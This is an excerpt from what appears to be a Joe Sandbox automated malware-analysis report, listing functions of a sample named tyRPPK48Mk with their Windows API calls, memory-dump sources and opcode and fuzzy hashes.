                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3470314060-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Virtual
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433FCE Relevance: 9.0, APIs: 6, Instructions: 40windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00433FDF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00433FF7
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00434006
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00434017
                                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00434022
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434029
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6d7c31bbfa6b3b8114dad7b7c2ee08b650c76bc0f6a005f10e60d9b42b3e3825
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F01D75681218BBE6215BA09D0AFEE776CAF09B01F104569FF01B61C1E7F42A0247AD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00432FEE Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00433024
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1690418490-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 735ec6acd85acabf56193826cd071f2489ef818a13be6dc6b3d06c037ab4ab6a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5E065315822216BD6261B346E4DBCF37A8EB2F752F141827F701D6250CB998445D7A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 442100245-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 621800784-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3884216118-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
